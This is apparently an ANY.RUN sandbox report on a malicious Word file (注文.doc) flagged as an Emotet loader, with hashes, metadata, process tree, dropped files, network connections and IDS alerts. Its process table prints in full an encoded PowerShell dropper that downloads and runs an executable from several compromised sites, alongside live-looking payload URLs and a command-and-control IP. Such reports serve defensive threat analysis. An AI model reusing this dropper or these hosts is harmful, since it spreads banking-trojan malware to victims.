analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

注文.doc

Full analysis: https://app.any.run/tasks/c5951f93-fedc-4fd1-a7dd-dda5c975f8f9
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: September 30, 2020, 07:43:49
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
loader
epoch3
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Quam., Author: Lena Moulin, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Sep 29 23:21:00 2020, Last Saved Time/Date: Tue Sep 29 23:21:00 2020, Number of Pages: 1, Number of Words: 3896, Number of Characters: 22208, Security: 8
MD5:

3AD298D93ECD6DE3EE91ED26BBCAE82B

SHA1:

7F49EC53FD4D51A3E31C062C8F6FA7FC7ABB8D40

SHA256:

170161C88EE1C40643A7DF7C86CDAE835418AD0592A88A2A63EC8979E41CDAAD

SSDEEP:

3072:+DW9ZcHT9yEgaLE47f4xlP83+lE8GtqzAr:+8ZcB7Lp4X80VGoAr

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Bthq___49.exe (PID: 2964)
      • KBDMONMO.exe (PID: 3196)
  • SUSPICIOUS

    • PowerShell script executed

      • POwersheLL.exe (PID: 2668)
    • Executed via WMI

      • POwersheLL.exe (PID: 2668)
    • Creates files in the user directory

      • POwersheLL.exe (PID: 2668)
    • Executable content was dropped or overwritten

      • POwersheLL.exe (PID: 2668)
      • Bthq___49.exe (PID: 2964)
    • Starts itself from another location

      • Bthq___49.exe (PID: 2964)
    • Reads Internet Cache Settings

      • KBDMONMO.exe (PID: 3196)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2100)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2100)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
LocaleIndicator: 1033
CodePage: Unicode UTF-16, little endian
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 15
CharCountWithSpaces: 26052
Paragraphs: 52
Lines: 185
Company: -
Security: Locked for annotations
Characters: 22208
Words: 3896
Pages: 1
ModifyDate: 2020:09:29 22:21:00
CreateDate: 2020:09:29 22:21:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Lena Moulin
Subject: -
Title: Quam.
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
4
Malicious processes
0
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe bthq___49.exe kbdmonmo.exe

Process information

PID
CMD
Path
Indicators
Parent process
2100"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\注文.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2668POwersheLL -ENCOD JABCADkAMQBtAHUAMAA3AD0AKAAnAFAAJwArACcAMwBpACcAKwAoACcAMQA2AG0AJwArACcAcQAnACkAKQA7AC4AKAAnAG4AJwArACcAZQAnACsAJwB3AC0AaQB0AGUAbQAnACkAIAAkAGUATgB2ADoAVQBTAEUAUgBQAFIAbwBGAGkATABlAFwAeQA1AHEAcQA3ADcAeQBcAFUAMABBAHEAWgBJAE4AXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAHIARQBDAHQAbwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBjAFUAUgBpAGAAVABgAFkAUABSAE8AdABgAE8AQwBgAG8AbAAiACAAPQAgACgAKAAnAHQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKwAoACcALAAnACsAJwAgAHQAJwApACsAJwBsACcAKwAoACcAcwAxACcAKwAnADEALAAgAHQAJwApACsAJwBsAHMAJwApADsAJABKAHgAZQA1ADUAZAB3ACAAPQAgACgAKAAnAEIAJwArACcAdABoAHEAJwApACsAKAAnAF8AXwAnACsAJwBfACcAKQArACcANAA5ACcAKQA7ACQAVAB2AGsAYgBwAGUAawA9ACgAKAAnAFQANwAnACsAJwBvAGoAdQAnACkAKwAnAF8AOQAnACkAOwAkAFIAdwA0AHQAdABsAHIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACgAJwBuADUAeQBZACcAKwAnADUAJwApACsAKAAnAHEAcQA3ACcAKwAnADcAeQBuACcAKQArACcANQAnACsAKAAnAHkAVQAwAGEAJwArACcAcQB6ACcAKwAnAGkAbgAnACkAKwAoACcAbgAnACsAJwA1AHkAJwApACkALQBSAGUAUABMAGEAYwBFACgAWwBjAGgAYQByAF0AMQAxADAAKwBbAGMAaABhAHIAXQA1ADMAKwBbAGMAaABhAHIAXQAxADIAMQApACwAWwBjAGgAYQByAF0AOQAyACkAKwAkAEoAeABlADUANQBkAHcAKwAoACgAJwAuACcAKwAnAGUAeAAnACkAKwAnAGUAJwApADsAJABXAGQAeQAwADEAcQBzAD0AKAAoACcASwAnACsAJwBnAGIAJwApACsAJwA4ACcAKwAoACcANwBkACcAKwAnADAAJwApACkAOwAkAEgAcwAzAG8AMABuAHMAPQAmACgAJwBuAGUAJwArACcAdwAtAG8AJwArACcAYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4ARQBUAC4AVwBlAGIAQwBMAGkAZQBOAHQAOwAkAEQAYwA3AHYAbgBfAGcAPQAoACgAJwBoAHQAdABwAHMAOgAnACsAJwAvAC8AJwArACcAdwB3ACcAKwAnAHcAJwApACsAKAAnAC4AcwAnACsAJwBiAG8AJwArACcAYgBlAHQAbQBvAG4AdAAnACkAKwAoACcAZQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAcAAtACcAKQArACgAJwBjAG8AbgAnACsAJwB0ACcAKwAnAGUAbgB0AC8AJwApACsAKAAnAHIAJwArACcANQAnACsAJwBxAFMALwAqAGgAdAB0AHAAJwApACsAKAAnADoAJwArACcALwAvACcAKwAnAHcAdwB3AC4AawAnACkAKwAoACcAdQBzACcAKwAnAGgAJwApACsAJwBhAGwAJwArACgAJwBiAGgAYQByACcAKwAnAGEAJwArACcAdABoAC4AYwAnACkAKwAoACcAbwAnACsAJwBtAC8AdwBwAC0AJwArACcAYwAnACsAJwBvAG4AdABlAG4AdAAnACsAJwAvAFcAcwBEAC8AKgAnACkAKwAnAGgAJwArACcAdAAnACsAKAAnAHQAcAA6AC8ALwAnACsAJwBkACcAKwAnAHUAJwApACsAJwBuACcAKwAoACcAaQBvAG4AJwArACcALgBpACcAKQArACgAJwByACcAKwAnAC8AcwAnACkAKwAoACcAdQBwAHAAbwByACcAKwAnAHQAJwApACsAKAAnAC8AOABVAFMAJwArACcATQAnACkAKwAnADAAJwArACcAaAAnACsAKAAnAGMAJwArACcAQQA0ACcAKQArACgAJwAvACoAaAB0AHQAJwArACcAcABzACcAKwAnADoALwAvAHMAdABvACcAKwAnAHIAeQBwAG8AJwApACsAKAAnAHMAdAAnACsAJwBhACcAKQArACgAJwByAC4AYwBvACcAKwAnAG0AJwArACcALwB3AHAALQBhAGQAJwApACsAJwBtAGkAJwArACgAJwBuAC8AJwArACcATgAvACcAKQArACcAKgBoACcAKwAnAHQAdAAnACsAJwBwAHMAJwArACgAJwA6AC8ALwB3AHcAdwAnACsAJwAuACcAKwAnAHAAJwArACcAaQB4ACcAKQArACgAJwBlAGwAcwAnACsAJwB0AG8AcgAnACsAJwB5AHQAJwApACsAJwBlACcAKwAoACcAbABsAGUAcgAnACsAJwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACkAKwAoACcALwB3AHAALQAnACsAJwBhAGQAbQAnACsAJwBpACcAKwAnAG4ALwBrAE4AJwApACsAKAAnAHoAMQAnACsAJwBnAC8AJwArACcAKgBoAHQAdABwACcAKwAnADoALwAvAHcAdwB3AC4AdAAnACsAJwBpACcAKwAnAGEAJwApACsAKAAnAG4AJwArACcAaABlAG4AZwAnACkAKwAoACcAZABhAG8AagBpACcAKwAnAHQAdQBhAG4ALgAnACsAJwBjACcAKwAnAG8AbQAnACkAKwAoACcALwB3AHAAJwArACcALQBpAG4AJwArACcAYwBsACcAKQArACgAJwB1ACcAKwAnAGQAZQBzAC8AJwApACsAKAAnAEoAVwBvACcAKwAnAGMAJwArACcAWQAvACoAJwApACsAKAAnAGgAdAB0AHAAJwArACcAOgAvACcAKwAnAC8AJwApACsAJwBuAGIAJwArACcAMgAxACcAKwAnAC4AeAAnACsAKAAnAHkAegAnACsAJwAvAGgAJwArACcAbwBtAGUAJwApACsAJwAvACcAKwAoACcAcwBJAEIATwAnACsAJwBGAGMAJwArACcAaQAnACkAKwAnADYALwAnACkALgAiAHMAUABgAGwAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQASwBsAGkAbAB0AHUAbgA9ACgAKAAnAEwAJwArACcAdgB3AHUAdgA0ACcAKQArACcAMAAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABCAHkAeABmAGoAcABxACAAaQBuACAAJABEAGMANwB2AG4AXwBnACkAewB0AHIAeQB7ACQASABzADMAbwAwAG4AcwAuACIARABvAFcATgBMAGAATwBhAGAAZABgAEYASQBMAGUAIgAoACQAQgB5AHgAZgBqAHAAcQAsACAAJABSAHcANAB0AHQAbAByACkAOwAkAE4AbQBlADcAZgBfAHUAPQAoACgAJwBCACcAKwAnAGkAeABpACcAKQArACcAYwBuACcAKwAnAG8AJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAJwArACcAbQAnACkAIAAkAFIAdwA0AHQAdABsAHIAKQAuACIATABgAGUAbgBHAGAAVABIACIAIAAtAGcAZQAgADMAMwAwADYAMAApACAAewAuACgAJwBJACcAKwAnAG4AdgBvACcAKwAnAGsAZQAtAEkAdABlACcAKwAnAG0AJwApACgAJABSAHcANAB0AHQAbAByACkAOwAkAE0ANgBqADIAeABlAGwAPQAoACgAJwBPAHMAJwArACcAZgAnACsAJwA1ADAAcgAnACkAKwAnAHYAJwApADsAYgByAGUAYQBrADsAJABWAG8AdAAwAGQAMwBxAD0AKAAnAFkAagAnACsAJwBrACcAKwAoACcAOABlACcAKwAnAGIAZAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWQB3AGQAOQB6AHIAOAA9ACgAJwBWAGUAJwArACgAJwB2ACcAKwAnAHIAcAByAGQAJwApACkA C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2964"C:\Users\admin\Y5qq77y\U0aqzin\Bthq___49.exe" C:\Users\admin\Y5qq77y\U0aqzin\Bthq___49.exe
POwersheLL.exe
User:
admin
Company:
Flex Inc.
Integrity Level:
MEDIUM
Description:
Replacement for the Masked Edit Control v 2.0.
Exit code:
0
Version:
2.8.0.3
3196"C:\Users\admin\AppData\Local\Vault\KBDMONMO.exe"C:\Users\admin\AppData\Local\Vault\KBDMONMO.exe
Bthq___49.exe
User:
admin
Company:
Flex Inc.
Integrity Level:
MEDIUM
Description:
Replacement for the Masked Edit Control v 2.0.
Version:
2.8.0.3
Total events
2 336
Read events
1 457
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
2100WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRAB54.tmp.cvr
MD5:
SHA256:
2668POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RFVO24CUIGBB6UGGIJWI.temp
MD5:
SHA256:
2668POwersheLL.exeC:\Users\admin\Y5qq77y\U0aqzin\Bthq___49.exe
MD5:
SHA256:
2964Bthq___49.exeC:\Users\admin\AppData\Local\Temp\~DFC12F3D2EA288F781.TMP
MD5:
SHA256:
2100WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$注文.docpgc
MD5:E1425072AD34A7CC14B18DCD258EFE4C
SHA256:787506258E58E34595301C9A6DF75D67CAC7DF7C35CEAB6B3BABD0A30D39376E
2100WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:79C56ECC1AD42BD858852E91F08BF836
SHA256:FA8D0B8F3F96ABBC0FB4C9384AC93F5F4BC1DDB044D21ADDAF8806B91AF7B802
2100WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:D422E6440B0F3C36981EF49880DC52E0
SHA256:451443FC8DC5743AA8CAEF3FE7461E8848DAFAFD88F7AC80A4025DF90FAA69DF
2668POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:36FE326E12493E805B62142553A1E43C
SHA256:3DD6ACC81930940EC26CE9794D473AC8869FCDB0D48BC71A20C27D80FF693B9F
2964Bthq___49.exeC:\Users\admin\AppData\Local\Vault\KBDMONMO.exeexecutable
MD5:3A2DD27A17EAA1CD6268549B91C26554
SHA256:31F5A4DA404A6AF898D07E428FB20F0DE2676733321DCB69C6EF1F11E7FEFD0F
2668POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1ab622.TMPbinary
MD5:36FE326E12493E805B62142553A1E43C
SHA256:3DD6ACC81930940EC26CE9794D473AC8869FCDB0D48BC71A20C27D80FF693B9F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
4
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3196
KBDMONMO.exe
POST
116.91.240.96:80
http://116.91.240.96/MoH7t/8SAIEy/r7P4FWSzr0Epr/s3vEFQOt99Zzmr/
JP
malicious
2668
POwersheLL.exe
GET
200
79.175.131.238:80
http://dunion.ir/support/8USM0hcA4/
IR
executable
400 Kb
suspicious
2668
POwersheLL.exe
GET
200
104.27.141.76:80
http://www.kushalbharath.com/wp-content/WsD/
US
html
4.19 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2668
POwersheLL.exe
18.140.12.187:443
www.sbobetmonte.com
Massachusetts Institute of Technology
US
unknown
2668
POwersheLL.exe
79.175.131.238:80
dunion.ir
Afranet
IR
suspicious
2668
POwersheLL.exe
104.27.141.76:80
www.kushalbharath.com
Cloudflare Inc
US
suspicious
3196
KBDMONMO.exe
116.91.240.96:80
ARTERIA Networks Corporation
JP
malicious

DNS requests

Domain
IP
Reputation
www.sbobetmonte.com
  • 18.140.12.187
unknown
www.kushalbharath.com
  • 104.27.141.76
  • 172.67.142.168
  • 104.27.140.76
suspicious
dunion.ir
  • 79.175.131.238
suspicious

Threats

PID
Process
Class
Message
2668
POwersheLL.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2668
POwersheLL.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2668
POwersheLL.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info